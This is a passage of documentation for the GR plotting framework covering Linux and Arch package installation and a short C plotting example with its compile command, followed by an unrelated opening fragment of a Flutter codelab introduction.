gr_volume(), you can use Xvfb or similar tools to start an X server that can be used by GR3.
Linux packages¶
Since GR v0.17.2 we provide python-gr .rpm and .deb packages for various Linux distributions using openSUSE Build Service. Your operating systems package manager will cope with package dependencies.
Please follow the installation instructions for your operating system described here.
We also provide Arch packages for C and Python GR on the Arch User Repository:
If you would like to generate video output, make sure the
ffmpeg package is installed before getting any package
from the AUR.
You can either install these AUR packages manually (see the Arch wiki for help) or by using an AUR helper like yay:
yay -S python-gr-framework
In this example,
yay will install C GR (package
gr-framework) as a dependency automatically.
Getting Started¶
After installing GR, you can try it out by creating a simple plot:
#include <stdio.h> #include <gr.h> int main(void) { double x[] = {0, 0.2, 0.4, 0.6, 0.8, 1.0}; double y[] = {0.3, 0.5, 0.4, 0.2, 0.6, 0.7}; gr_polyline(6, x, y); gr_axes(gr_tick(0, 1), gr_tick(0, 1), 0, 0, 1, 1, -0.01); // Press any key to exit getc(stdin); return 0; }
To compile and link this example on Linux or macOS, you can run:
cc -I<grdir>/include -L<grdir>/lib -Wl,-rpath,<grdir>/lib -lGR example.c -o example
where you replace
<grdir> with the path to your installation of GR.
API Reference¶
The C API for GR consists of:
|
https://gr-framework.org/c.html
|
CC-MAIN-2021-21
|
refinedweb
| 383
| 63.29
|
Listen Specific UserData field [SOLVED]
On 19/03/2016 at 23:15, xxxxxxxx wrote:
Hi, i need to execut some functions from my script everytime when user change something in one user data field. Im just a beginer in python sdk and i dont understand very well how it works but i thought a little and i made for my userdata field that i want to listen a clone and i hide it from script(just to store the old value) and i compare always with main field. If something changed i do something. In may case i just change the value of chekbutton.
here my script:
import c4d
def main() :
obj = op.GetObject() #get an object with python tag
ud = obj.GetUserDataContainer() #get an userdata container
ud[2][1][c4d.DESC_HIDE] = True #hide my field copy
obj.SetUserDataContainer(ud[2][0], ud[2][1])
new = obj[c4d.ID_USERDATA,1] #value of my filed that i want to listen
old = obj[c4d.ID_USERDATA,3] #value of clone
if old != new:
obj[c4d.ID_USERDATA,2] = 1 - obj[c4d.ID_USERDATA,2] #change value of radiobutton to oposite
obj[c4d.ID_USERDATA,3] = new #store value of my field to clone
So it works well but it looks like a trick. Is there other method to listen a change in userdata filed?
On 21/03/2016 at 03:07, xxxxxxxx wrote:
Hello,
what exactly do you mean with "script"? Do you mean a script that is stored and executed from the Script Manager? A script in the Script Manager can only be executed from that Script Manager, it cannot be triggered by an event.
Or is your script stored in a Python Tag? Then the best way would be indeed to store the old value in another user data field and compare it with the current value.
Best wishes,
Sebastian
On 21/03/2016 at 05:09, xxxxxxxx wrote:
From python tag. Thank you.
On 21/03/2016 at 05:26, xxxxxxxx wrote:
Originally posted by xxxxxxxx
Or is your script stored in a Python Tag? Then the best way would be indeed to store the old value in another user data field and compare it with the current value.
You can store the old value without an additional user data field.
import c4d G = {} def main() : value = op[c4d.ID_USERDATA, 1] if value != G.get('old_value') : # Value changed or first time the script is run (eg. if # the scene was just opened). G['old_value'] = value
Best,
Niklas
On 21/03/2016 at 07:30, xxxxxxxx wrote:
good method NiklasR. Thank you
|
https://plugincafe.maxon.net/topic/9401/12589_listen-specific-userdata-field-solved
|
CC-MAIN-2021-17
|
refinedweb
| 428
| 75.1
|
problems building - executable package and dependent library package in the same catkin workspace [closed]
Hi,
I'm having some problems getting to grips with catkin/cmake.
Essentially I have 2 CPP packages in the same workspace: 'serial_port' - which is a library build, and 'sonar_interface' - which is an executable "driver" (depends on serial_port)
I cannot figure out how to go about setting up the CMake files to compile this workspace. At the moment I just keep getting:
sonar_interface.cpp:7:27: fatal error: serial_port.hpp: No such file or directory... the offending line is just from me including serial_port.hpp:
#include <serial_port.hpp>
I think this is a problem to do with me not linking properly, but I'm very new to all this so not sure where to start
Any help / tutorial links would be much appreciated,
Thanks
This is not a linker problem, but a compiler problem, probably wrong configuration of include directories. The ROS default would place includes in include/pkg, so the include should read
#include "serial_port/serial_port.hpp", but I don't know how your package is layed out.
Please post more information about your packages, e.g. links to the repos. Than we can provide better support.
|
https://answers.ros.org/question/61207/problems-building-executable-package-and-dependent-library-package-in-the-same-catkin-workspace/
|
CC-MAIN-2021-31
|
refinedweb
| 202
| 56.76
|
Torsten Curdt wrote:
> On 08.03.2008, at 15:25, James Carman wrote:
>
>> On 3/8/08, Torsten Curdt <tcurdt@apache.org> wrote:
>>>
>>> On 08.03.2008, at 13:44, James Carman wrote:
>>>
>>>> All,
>>>>
>>>> The wicket folks are investigating using Commons Proxy and they
>>>> don't want to have to decide which implementation (jdk, cglib,
>>>> javassist) to use themselves. They would like us to split up
>>>> Commons Proxy into 3 jars, commons-proxy, commons-proxy-cglib,
>>>> commons-proxy-javassist. Any thoughts?
>>>
>>>
>>> Is the discovery such a big problem with proxy? ...in general I
>>> prefer the static discovery type. But someone has to do it.
>>
>> Well, Johan makes a good case. He's writing some code that he wants
>> to use Proxy, but he doesn't want to have to figure out what
>> implementation to use himself. He'd rather it be done automatically
>> for him, by doing something like ProxyFactory.getInstance(). I
>> thought about this at one time. I guess we could say, instantiate
>> your class that's based on Proxy by passing in whatever
>> implementation the client wants. So, he could have something like:
>>
>> public class MyFrameworkClass
>> {
>> public MyFrameworkClass(ProxyFactory proxyFactory) {
>> this.proxyFactory = proxyFactory;
>> }
>>
>> public Object createSomeKindOfProxy(SomeArgument arg) {
>> return proxyFactory.create...
>> }
>> }
>
> Well, one could just try and see what classes are available in the
> classpath. This could be easily be done in a wrapper class as you
> suggested.
Shrug. And suddenly someone adds a new library that introduces new deps (e.g. Hibernate to
CGLIB). Why not simply use JDK proxy as default and use a system property to override the
default selection? If a project is dependend on a more powerful proxy implementation they
have to select one themselves or document this fact for their users (e.g. they have to use
CGLIB- or JavaAssist-based proxies).
- Jörg
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org
|
http://mail-archives.apache.org/mod_mbox/commons-dev/200803.mbox/%3CF0D7281DAB048B438E8F5EC4ECEFBDDC02B774D1@esmail.elsag.de%3E
|
CC-MAIN-2015-14
|
refinedweb
| 320
| 59.5
|
Re: updating to 2003
- From: "Lanwench [MVP - Exchange]" <lanwench@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Date: Mon, 16 Jan 2006 22:45:43 -0500
In F_Vyf.317$MJ.123@fed1read07">news:F_Vyf.317$MJ.123@fed1read07,
anon <not@xxxxxxxxx> typed:
> i'm faced with the task of updating windows 2000 advanced server
> (with 2 active directory/fileservers clustered together in failover
> configuration).
>
> since the domain they have set up is sales.company.com, i'm probably
> just going to start them on a new domain as per todays standard such
> as company.local or company.corp. any recommendations for which
> naming scheme i should use?
Well, if sales.company.com doesn't exist on the Internet for any useful
purpose, no harm in leaving it in place as your AD DNS namespace. It may
actually be preferable over using .local or .kitten or .whatnot. I often
use internal.company.com or local.company.com.
>
> also, i'm pretty sure i should just start a brand new domain
> structure from scratch to ensure that there are no previous "ghosts"
> or some such floating around waiting to deliver the hammer.
Why? Are you worried that the current installation is full of problems?
Don't make more work for yourself ...I'm no clustering expert, but I think
you don't want to muck around with something that works.
> does
> anyone have books or other reading related for planning and deploying
> such and move?
>
> -a
.
- Follow-Ups:
- Re: updating to 2003
- From: anon
- References:
- updating to 2003
- From: anon
- Prev by Date: Re: "Rogue" IP address?
- Next by Date: Re: "Rogue" IP address?
- Previous by thread: updating to 2003
- Next by thread: Re: updating to 2003
- Index(es):
|
http://www.tech-archive.net/Archive/Win2000/microsoft.public.win2000.networking/2006-01/msg00273.html
|
crawl-002
|
refinedweb
| 280
| 66.84
|
Created attachment 43618 [details]
Repro test
Can't type when the content-editable object has focus. This occurs when there is a DIV element with only a non-editable elemnt.
(see attached test case)
Created attachment 43619 [details]
Proposed patch
Working on the test case. No change log yet.
Created attachment 43818 [details]
Patch
Attachment 43818 [details] did not pass style-queue:
Failed to run "WebKitTools/Scripts/check-webkit-style" exit_code: 1
Done processing WebCore/rendering/RenderText.h
Done processing WebCore/editing/htmlediting.cpp
WebCore/dom/Position.cpp:327: Boolean expressions that span multiple lines should have their operators on the left side of the line instead of the right side. [whitespace/operators] [4]
Done processing WebCore/dom/Position.cpp
Done processing WebCore/dom/PositionIterator.cpp
Done processing WebCore/dom/Position.h
Done processing WebCore/dom/PositionIterator.h
Done processing WebCore/rendering/RenderObject.cpp
Done processing WebCore/rendering/RenderText.cpp
Total errors found: 1
Created attachment 44038 [details]
Patch2
Fixed line 327 in Position.cpp to have && at the beginning of the line.
style-queue ran check-webkit-style on attachment 44038 [details] without any errors.
Comment on attachment 44038 [details]
Patch2
It seems unnecessary to make atEditingBoundary be a member function on Position and PositionIterator. Can we instead just make those free functions?
> +// A position is considered at editing boundary if one of the following is true:"
Stray quote mark on the end of the line above.
> +// 1. it is the first position in the node and the next visually equivalent position
> +// is non editable
> +// 2. it is the last position in the node and the previous visually equivalent position
> +// is non editable
> +// 3. is is an editable position and both the next and previous visually equivalent
> +// positions are both non editable
Typo "is is" here. I would put capital letters and periods on these three conditions.
> + return (nextPosition.isNotNull() && !nextPosition.node()->isContentEditable())
> + && (prevPosition.isNotNull() && !prevPosition.node()->isContentEditable());
I think this would read better without the parentheses. Also, the second line should be indented only 4 spaces, not 7 -- we don't try to line things up.
> +Position Position::upstream(EditingBoundaryCrossingRule upRule) const
I'd probably call this boundaryRule or crossingRule or even "rule" rather than upRule.
> return Position();
> -
> +
> // iterate forward from there, looking for a qualified position
The patch has a lot of whitespace changes like the above. It would be better to not have these changes.
> + bool lastPosition = (caretOffset == lastOffsetInNode(node()));
> + Node* startNode = (lastPosition)? node()->childNode(caretOffset - 1): node()->childNode(caretOffset);
It should be formatted as "lastPosition ? a : b" rather than "(lastPosition)? a: b".
> +bool PositionIterator::atEditingBoundary() const
> +{
> + if (!m_anchorNode)
> + return false;
> +
> + return Position(*this).atEditingBoundary();
> +}
I don't think you need a special case for !m_anchorNode here. Do you?
> // If this is a non-anonymous renderer, then it's simple.
This comment seems wrong now. It's not all that simple any more! Maybe we should say something more about it rather than "it's simple".
> - if (Node* node = this->node())
> + if (Node* node = this->node()) {
> + if (!node->isContentEditable()) {
> + // prefer a visually equivalent position that is editable
We use sentence format for this type of comment. Capitals and a period at the end.
> + Position pos(node, offset);
It would be better to name this "position" rather than "pos".
> + int len = textLength();
This should be unsigned rather than int. And should be named a word, like "length" rather than an abbreviation such as "len".
> + const UChar* txt = characters();
Instead of "txt" I suggest either "characters" or "text" as the name for this local variable.
> + for (int i = 0; i < len; i++)
> + if (!style()->isCollapsibleWhiteSpace(txt[i]))
> + return false;
WebKit coding style uses braces around a multi-line for statement like this one.
r=me -- all the comments are optional things
Committed revision 51522.
I've addressed all comments from Darin.
*** Bug 20325 has been marked as a duplicate of this bug. ***
*** Bug 19698 has been marked as a duplicate of this bug. ***
|
https://bugs.webkit.org/show_bug.cgi?id=31750
|
CC-MAIN-2022-40
|
refinedweb
| 655
| 51.44
|
Assign to me Condition - HelpAlmeidaR Aug 29, 2016 7:35 AM
Hi All,
I am having an issue on the "assign to me" function that did not occur in the past.:
When the assigned user is not the current analyst, the option should appear.
Currently, when an incident is open, it is shifted to a support group and only later assigned to an analyst, so no analyst will be assigned at this stage (value will be null).
I compared with an older incident that I had opened previously and the "Assign to me" option appears if there is a value in the analyst field which is not the current user
Is it possible to have also this option activated if the analyst field is null?
I am quite sure this was working this way in the past.
Many thanks in advance.
Best Regards,
Ricardo Almeida
1. Re: Assign to me Condition - HelpMarkus.Gonser Aug 29, 2016 7:48 AM (in response to AlmeidaR)
2. Re: Assign to me Condition - Helpcsoto Aug 29, 2016 8:23 AM (in response to Markus.Gonser)1 of 1 people found this helpful
I use a similar Calculation:
import System
static def GetAttributeValue(Request):
Value = false
if Request.CurrentAssignment != null:
if Request.GetCurrentUserName() != Request.CurrentAssignment.User.Name:
Value = true
return Value
Note, this is for Request, but I do a similar thing with Incident. Condition = "Equals"; Value Type="Specific value"; Value = "True"
So, why might a standard condition evaluation not work? If there is no current assignment User, the attribute being evaluated is null. Only a calculation can first check for the null condition, then make the evaluation. You *could* theoretically use a standard condition check, but only if your process assures there is always an assignment before this condition. As these calculations will work regardless, it's a better idea just to use the calculation.
Charles
3. Re: Assign to me Condition - HelpAlmeidaR Aug 29, 2016 8:54 AM (in response to Markus.Gonser)
Hello Makus,
thanks for the feedback.
After a bit more investigation I realized this is not working due to the fact that the "user assignment" is not filled when in progress. As there is no value, the system does not compare. I will have to add the IF NULL also to the condition.
Many thanks for the feedback
Best Regards,
Ricardo
4. Re: Assign to me Condition - HelpAlmeidaR Aug 29, 2016 8:55 AM (in response to csoto)
Hello csoto,
thanks for the swift feedback.
I realized this is not working due to the fact that the "user assignment" is not filled when in progress. As there is no value, the system does not compare. I will have to add the IF NULL also to the condition. If I have an analyst on that field that is not the current user, the assign to me option, appears.
Many thanks for the feedback
Best Regards,
Ricardo
|
https://community.ivanti.com/message/131219?tstart=0
|
CC-MAIN-2018-43
|
refinedweb
| 485
| 64.1
|
Pádraig Brady <address@hidden> writes: > +#if HAVE_C99_STRTOLD /* provided by c-strtold module. */ > +# define STRTOD strtold > +#else > +# define STRTOD strtod > +#endif > + > char *ea; > char *eb; > - double a = strtod (sa, &ea); > - double b = strtod (sb, &eb); > + long double a = STRTOD (sa, &ea); > + long double b = STRTOD (sb, &eb); This could cause performance problems on machines that have slow long-double operations (implemented via traps, say) and that lack strtold. How about doing something like this instead? It tries to move as much of the mess as possible to the #if part. #if HAVE_C99_STRTOLD # define long_double long double #else # define long_double double # undef strtold # define strtold strtod #endif ... long_double a = strtold (sa, &ea); long_double a = strtold (sa, &ea);
|
http://lists.gnu.org/archive/html/bug-coreutils/2010-04/msg00206.html
|
CC-MAIN-2015-06
|
refinedweb
| 115
| 60.95
|
Info
This guide will focus on the installation of a ‘Create Sales Orders’ Transactional Fiori App in an ABAP environment on ERP 6.0 EHP 7 running embedded Gateway using transaction SAINT. There are also other ways to install the apps with SAP Maintenance Planner not described here.
Prerequisites
Make sure you have installed and configured the Gateway and all necessary SAPUI5 components.
Business Scenario
You have been asked to simplify the user experience at your company to save up on training for new and existing employees for Field Sales Representatives. You have heard of FIORI but are not sure how to start.
Step 1 – Find a FIORI app to simplify Sales Orders creation
Access the following link: and search for ‘Create Sales Orders’ app.
The above website should be the main starting point when implementing a FIORI app. It describes the app features, installation information, configuration as well as extension points which tell you what features of the standard app can be enhanced. If you can’t find a relevant FIORI app, you may consider creating a custom one.
Once you have found the required app, you may want to check the database it runs on as well as the prerequisites for installation:
‘Any DB’ means we don’t need the HANA database. If the above says ‘HANA’ then we either need SAP Business Suite on HANA or S/4 Hana in order to install and run the app.
Step 2 – Deploy the Front-End Components
a) Download the Front-End component files
From the FIORI catalogue identify the front ends components to be installed (Implementation Information/Installation/Front-End Components):
Download the above component from:
Along with all the corresponding support packages 0001-0010
Example:
b) Install the files
Log in to client 000 of your system.
Run transaction SAINT.
Install the downloaded UI components.
c) Activate the SICF for App URL
Identify name of the app from the Fiori apps library (Implementation Information/Configuration/SAPUI5 Application)
Run transaction SICF and use the following path: default_host -> sap -> bc -> UI5_UI5 -> sap -> sd_so_cre
You can see that the service is grey which means inactive. Right click it and activate.
Step 3 – Deploy the Back-End Components
a) Download the Back-End components files
From the FIORI apps catalogue identify the front ends components to be installed (Implementation Information/Installation/Back-End Components):
Download the above component from:
Along with the support packages 0001 – 0008
b) Install the files
Log in to client 000 of your system.
Run transaction SAINT.
Install the downloaded Back-End components.
c) Activate the OData service
Identify the name of the OData Service from the Fiori apps catalogue (Implementation Information/Configuration/OData Services)
Run transaction /IWFND/MAINT_SERVICE and click ‘Add Service’:
Choose the System Alias and Technical Service Name:
Select the displayed Backend Service and click on ‘Add Selected Services’:
You will get an ‘Add Service’ pop up. Assign a package (I am using a local object for test purposes – in real scenario create a package)
And press continue.
The OData service should now be visible in the Service Catalog of transaction /IWFND/MAINT_SERVICE
Step 4 – Authorizations
SAP provides you with role templates once you install the relevant app components. You can either use the existing components or take a Z copy of the template. It is up to your authorization team and should be adapted to your authorization concept.
Since I am using embedded Gateway the following steps may differ if using Gateway Central Hub Deployment where you need to take care of authorizations both on the ECC side and the Gateway side.
a) Create PFCG role with Launchpad Start Authorization
Copy role SAP_UI2_USER_700 under the Z namespace e.g. Z_UI_USER
Click on the ‘Menu’ tab and add ‘Authorization Default’
Add IWSG authorizations for: ZINTEROP_0001 and ZPAGE_BUILDER_PERS_0001
Go to tab ‘Authorizations’ click on ‘Change Authorization Data’
Click:
Add the following authorization objects:
Make sure the traffic lights are green by clicking on them:
Generate the authorization profile and save it.
Assign the authorization role to the user in the ‘User’ tab and click on ‘User Comparison’
b) Create PFCG Role for Launchpad Catalogues and Groups
Find the business role template in the FIORI apps library documentation for our SD app.
Go to transaction PFCG and copy it into the Z namespace e.g. ZSAP_SD_BCR_FIELDSALESREP_X1
In our new role we can see that the following elements have been copied:
Which gives users access to the tile catalogue and tile group in the FIORI Launchpad.
Generate a profile and assign to the user just like in step a)
c) Create PFCG role to access oData services
Copy roles SAP_SD_SO_CRE_APP under Z namespace e.g. ZSAP_SD_SO_CRE_APP
Add IWSG authorizations for: ZSRA017_SALESORDER_CREATE_SRV_0001
Go to the ‘Menu’ tab and click on add ‘Authorization Default’
Enter the following details:
Save the role menu and you should now see the following:
Generate the profile and assign to the user just like in step a)
Note: In backend the user must have authorization to RFC trusted connection if you have a central hub gateway.
To check for authorisation issues to the backend use transaction: IWFND/ERROR_LOG
Step 5 – Test the app
The natural environment as an entry point for FIORI apps is the FIORI Launchpad which is a container for all your FIORI apps and it should be used in the production environment. After the installation you may want to test if the app is working correctly and test it in the standalone mode.
In order to run the app in a standalone mode you need to use the following link format:
http://<server>:<port>/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?sap-client=<client>#Shell-runStandaloneApp?sap-ushell-SAPUI5.Component=<ComponentName>&sap-ushell-url=<Encoded-URL>&<AdditionalApplicationParameterKey>=<AdditionalApplicationParameterValue>
Server and port
This is your server name and port your app will be running on
Component Name
To get the Component name run the following link: http://<server>:<port>/sap/bc/ui5_ui5/sap/sd_so_cre/Component.js
And get the component name:
Shell url
This is the URL pointing to the app resource file location on the server: /sap/bc/ui5_ui5/sap/sd_so_cre
The full link will look as follows:
You should now be able to test your app in the standalone mode. The configuration of the Fiori Launchpad will be described in my next blog.
Hmmmm.... rather think you are missing a few steps there... such as:
Also - probably not good to suggest we always use $TMP - that's ok for a Proof of Concept but not for a development project that is planning to go to production.
You might want to also reference the full documentation on how to do this... in the UI Technology Guide for the relevant release..
Thank you for your comments. I am aware of the above but the purpose of this guide is the bare minimum on how to install the app without configuring any authorizations, adding to the launchpad etc. Also I am not suggesting to always use $TMP. I have clearly mentioned it was done for test purposes. But to avoid misunderstanding I have also mentioned to create a package in real production scenarios.
The challenge always with bare bones guides is that they still need to work... so you might also want to edit it to mention you are using a user with SAP_ALL in both frontend server and backend server. Otherwise it won't be too long before the dreaded "Could not open app. Try again later" message appears.
I have now added a step about authorizations. I am using an embedded Gateway so no split to backend and frontend servers in my case.
Hi Radek,
Thanks for such an helpful post. I was trying to install the same application. But in fiori apps library under installation section I could not find the Software component version for Front end components which you have mentioned above inside red box.
Same for the back end components. I am attaching both the images. Hence I am not able to see the ICF(SD_SO_CRE) in my front end server. Please guide me how to proceed further.
Thanks in Advance.
Thanks,
Unfortunately all links to pictures are gone?
Is there not a link to Standard SAP documentation?
Bas
|
https://blogs.sap.com/2016/09/27/how-to-install-a-fiori-app/
|
CC-MAIN-2021-10
|
refinedweb
| 1,372
| 50.87
|
#include <rte_flow.h>
Matching pattern item definition.
A pattern is formed by stacking items starting from the lowest protocol layer to match. This stacking restriction does not apply to meta items which can be placed anywhere in the stack without affecting the meaning of the resulting pattern.
Patterns are terminated by END items.
The spec field should be a valid pointer to a structure of the related item type. It may remain unspecified (NULL) in many cases to request broad (nonspecific) matching. In such cases, last and mask must also be set to NULL.
Optionally, last can point to a structure of the same type to define an inclusive range. This is mostly supported by integer and address fields, may cause errors otherwise. Fields that do not support ranges must be set to 0 or to the same value as the corresponding fields in spec.
Only the fields defined to nonzero values in the default masks (see rte_flow_item_{name}_mask constants) are considered relevant by default. This can be overridden by providing a mask structure of the same type with applicable bits set to one. It can also be used to partially filter out specific fields (e.g. as an alternate mean to match ranges of IP addresses).
Mask is a simple bit-mask applied before interpreting the contents of spec and last, which may yield unexpected results if not used carefully. For example, if for an IPv4 address field, spec provides 10.1.2.3, last provides 10.3.4.5 and mask provides 255.255.0.0, the effective range becomes 10.1.0.0 to 10.3.255.255.
Definition at line 2026 of file rte_flow.h.
Item type.
Definition at line 2027 of file rte_flow.h.
Pointer to item specification structure.
Definition at line 2028 of file rte_flow.h.
Defines an inclusive range (spec to last).
Definition at line 2029 of file rte_flow.h.
Bit-mask applied to spec and last.
Definition at line 2030 of file rte_flow.h.
|
http://doc.dpdk.org/api/structrte__flow__item.html
|
CC-MAIN-2022-27
|
refinedweb
| 333
| 68.77
|
We are happy to announce that we will be releasing the next CTP/LABS bits on April 5th. We would also like to take this opportunity to give you a heads-up on the impact
due to the release. Because of the nature of feature enhancements, we will be installing fresh bits in Azure environment and releasing a new version of client SDK. Please note all existing configuration in the Service EAI and EDI LABS environment will be removed
except probably namespaces.
Users are advised to complete the following activities by
noon April 4th:
Detailed feature announcements will be posted in the forums post the release.
-
Azure Integration Services Team
Microsoft is conducting an online survey to understand your opinion of the Msdn Web site. If you choose to participate, the online survey will be presented to you when you leave the Msdn Web site.
Would you like to participate?
|
http://social.msdn.microsoft.com/Forums/en-US/servicebuslabs/thread/82f645f3-224d-45b7-a50f-705fc1b3309e
|
CC-MAIN-2013-20
|
refinedweb
| 150
| 61.16
|
To solve this problem, the getgroups(int gidsetlen, gid_t *gidset) function is needed. The code below shows how to use this. Currently the example will set access = to 1 for anyone in group 0 (wheel) or leave access as zero for everyone else. It is set to check a maximum of 5 groups.
By changing the #defines you can easily make this code search for any group, and make it check more or less groups that a user is a member of, depending on how your system is setup.
#include <sys/types.h>
#include <unistd.h>
/* Group to search for, and max groups to look at *
* with the user */
#define GROUP 0
#define MAX_GROUPS 5
gid_t gidset[MAX_GROUPS];
int groups;
int i;
int access=0
/* Get the groups, then loop through to see if *
* desired group is present */
groups = getgroups(MAX_GROUPS, gidset);
for (i=0; i<=groups-1; i++)
if (gidset[i]==GROUP) access=1;
/* Also check if desired group is primary group *
* (then it doesn't show in getgroups) */
if (getegid()==GROUP) access=1;
Log in or register to write something here or to contact authors.
Need help? accounthelp@everything2.com
|
https://everything2.com/title/getgroups+%2528int+gidsetlen%252C+gid_t+%252Agidset%2529
|
CC-MAIN-2021-10
|
refinedweb
| 192
| 63.12
|
Microsoft has created a unique benchmark in the world of cloud computing with Microsoft Azure. Many renowned enterprises all over the world use Microsoft Azure for its various IaaS solutions. Azure Storage is one of the proven and highly demanded solutions on Microsoft Azure for enterprises to avail cost-effective, secure, and resilient data storage. Therefore, many aspiring database administrators, engineers, and data specialists look towards an Azure Storage tutorial.
The following discussion would serve as a tutorial on Azure Storage with in-depth insights on its types and architecture. Readers can use the information presented below to anticipate the effectiveness of Azure Storage as a modern cloud-based storage system.
Enroll Now: Microsoft Azure Certifications Training Courses
What is Azure Storage?
The first concern in any Azure Storage tutorial directly refers to its definition. Azure Storage is the cloud storage solution of Microsoft for various new data storage scenarios in present times. As the volume of data in various repositories and warehouses increases every day, enterprises need better methods of storage.
Now, it is obvious to wonder about the reasons to opt for storing in the cloud in the first place. First of all, you don’t need any physical space or hardware for storing your massive amount of data, thereby ensuring cost savings. Cloud storage allows users to scale the storage capacity up or down according to their requirements.
Most important of all, cloud storage makes sure that your data is available to you at all times. The core storage services on Azure Storage offer different options such as disk storage for Azure virtual machines (VMs), messaging stores, NoSQL store, file system service, and a massively scalable object-store.
Why is Azure Storage Important?
The types of storage services you can find in an Azure Storage tutorial can offer the following functionalities for users.
- Redundancy in Azure Storage helps in ensuring data safety in the event of unprecedented hardware failures. Users can also choose to replicate data throughout datacenters or geographical regions to ensure additional protection from natural disasters. The replication of data in this manner also provides higher data availability in the event of unexpected downtime.
- The services on Azure Storage offer the highest levels of security through encryption of all data written to Azure Storage accounts. Azure Storage also provides fine-grained control over access privileges to users.
- The design of Azure Storage specifically aims at providing the desired scalability for addressing data storage and performance requirements of modern applications.
- Azure Storage also ensures comprehensive management of hardware maintenance, critical issues, and other associated updates for users.
- The final aspect pertaining to the advantages of Azure Storage in an Azure Storage tutorial refers to accessibility.
Users can access data in Azure Storage from almost anywhere through HTTP or HTTPS. Microsoft also provides client libraries for Azure Storage in different languages such as Python, .NET, Java, Go, PHP, Node.js, Ruby, and others. In addition, you also get a mature REST API with Azure Storage.
Another interesting factor of Azure Storage in terms of accessibility refers to the support for scripting in Azure CLI or Azure PowerShell. Most important of all, Azure Storage Explorer and the Azure portal provide flexible visual solutions for working with data.
Also Read: Microsoft Azure Certification Path
Types of Azure Storage Services
Now, the attention in any tutorial on Azure Storage would divert towards the Azure storage types. You can find the types of Azure storage by reflecting on the data services available on the Azure Storage platform. Users can access the different types of Azure storage through their Azure Storage account. Here are the five types of Azure storage services.
- Azure Blobs
- Azure Queues
- Azure Disks
- Azure Tables
- Azure Files
Let us reflect on the details of these services to strengthen this Azure Storage tutorial.
1. Azure Blob Storage
Azure blob storage is the object storage solution of Microsoft, especially aimed at the cloud. The design of blob storage is effectively tailored for the storage of massive volumes of unstructured data in the text and binary forms. An Azure blob storage tutorial would showcase the different use cases for this. It is suitable. Blob storage is suitable for streaming video and audio, storage of files for distributed access, and delivering images or documents directly to browsers.
In addition, blob storage is also fit for the storage of data for backup and restore, archiving, and disaster recovery. Blob storage also helps in data storage for analysis through an Azure-hosted or on-premises service. Client applications or users can access blobs through URLs, Azure CLI, Azure Storage REST API, an Azure Storage client library, or Azure PowerShell.
2. Queue Storage
The Azure Queue service is also an important addition in Azure Storage tutorial among types of Azure storage. It can help in the storage and retrieval of messages. Queue messages could be up to 64 KB in terms of size, and a queue has the capacity for containing millions of messages. Queues are generally applicable for storing a list of messages for asynchronous processing.
3. Disk Storage
Disk storage in Azure Storage is possible through an Azure managed disk. It is actually a virtual hard disk (VHD) that you can think of as a physical disk that has been virtualized. Azure managed disks are abstractions over page blobs, which are random IO storage objects in Azure. Managed disks are also abstractions over Azure storage accounts and blob containers. In the case of managed disks, users have to worry only about provisioning the disk while allowing Azure to manage the rest.
4. Table Storage
Table storage is also one of the prominent additions in the Azure Storage tutorial regarding the types of storage services. Azure Table storage is now available as a part of Azure Cosmos DB. The Azure Cosmos DB Table API offers automatic secondary indexes, throughput-optimized tables, and global distribution. Therefore, Azure Table storage also presents reliable claims as a better storage alternative on Azure.
5. Azure Files
The final and one of the notable entries in types of storage in an Azure Storage tutorial is Azure Files. Azure Files help in creating highly available network file shares accessible through the use of standard Server Message Block (SMB) protocol. As a result, it can ensure that multiple VMs could share the same files with reading as well as write access.
In addition, Azure Files also allow users to read the files through the storage client libraries or REST interface. Azure Files are different from files on a corporate file share due to their accessibility. Users can access Azure Files from anywhere in the world with a URL pointing to the file that also has a shared access signature (SAS) token. SAS tokens offer specific access to a private asset for a particular amount of time.
The Architecture of Azure Storage
The final aspect of an Azure Storage tutorial would refer to its architecture. Till now, you noticed the functionalities and different services on Azure Storage. So, it is inevitable to wonder how Azure Storage is capable of achieving its functionalities. Therefore, readers need a brief overview of the architecture of Azure Storage to understand it better.
The foremost aspect of Azure Storage architecture is that data on Azure Storage is automatically triplicated by default. In general cases, Azure Storage creates three copies of data inside storage stamps along with another region with active geo-resiliency. So, the discussion on the architecture of Azure Storage starts with a reflection on Stamps.
Azure Storage Stamps
Azure classifies entities into Stamps with each stamp having its own fabric controller. A particular Storage Stamp is actually a cluster of N racks of storage nodes, with each rack built out as a distinct fault domain having redundant power and networking. Azure Storage Stamps serve as a unit of deployment and management in data centers and support the reduction of fault tolerance.
Location Service
The next important aspect of an Azure Storage tutorial about its architecture is the Location Service. The Location Service in Azure ensures efficient and responsible management of storage stamps. In addition, it is also responsible for managing account namespaces across all stamps. The Location Service is also distributed across two geographical locations for ensuring disaster recovery for itself.
Layers of Architecture in Azure Storage
Azure Storage relies on the architecture layers inside stamps for maintaining consistency, availability, and durability of data in a specific Azure Region. The Stream Layer or the Distributed File System (DFS) layer is the first layer of Azure Storage architecture.
The layer involves the storage of bits on disk and is responsible for the management of the disk. The Partition Layer in the architecture serves as the core essence of Azure Storage. It is the place where a major share of decision making happens on Azure Storage. The final layer, i.e., the Front End Layer, is necessary for obtaining a rest protocol for all Azure Storage abstractions.
Preparing for the Azure interview? Don’t miss to go through these frequently asked Azure interview questions and get ready to ace the interview.
Ready to Learn More About Azure Storage?
On a concluding note, there is a lot to learn about Azure Storage other than the information presented here. The above-mentioned Azure Storage tutorial definitely gives insights into the types and architecture of Azure Storage. However, you need to gain hands-on experience for understanding the functionalities of Azure Storage comprehensively.
For example, you can start by learning the steps in the process to create a new storage account. On the other hand, readers can also explore many other aspects of Azure Storage, such as types of authentication measures and storage accounts on Azure Storage. Dive into the world of Azure Storage to learn more right now!
If you’re aspiring to build a successful career in Azure, start learning now and validate your skills with one of the relevant Azure certifications. Don’t forget to check our Azure certification training courses that would help you prepare and pass your Azure certification.
The post Azure Storage Tutorial – Learn the Details appeared first on Whizlabs Blog.
|
https://awsfeed.com/whats-new/certification/azure-storage-tutorial-learn-the-details
|
CC-MAIN-2021-31
|
refinedweb
| 1,687
| 54.22
|
create a simple mobile Flutter app. If you're familiar with object-oriented code and basic programming concepts—such as variables, loops, and conditionals—then you can complete the codelab. You don't need previous experience with Dart or mobile programming.
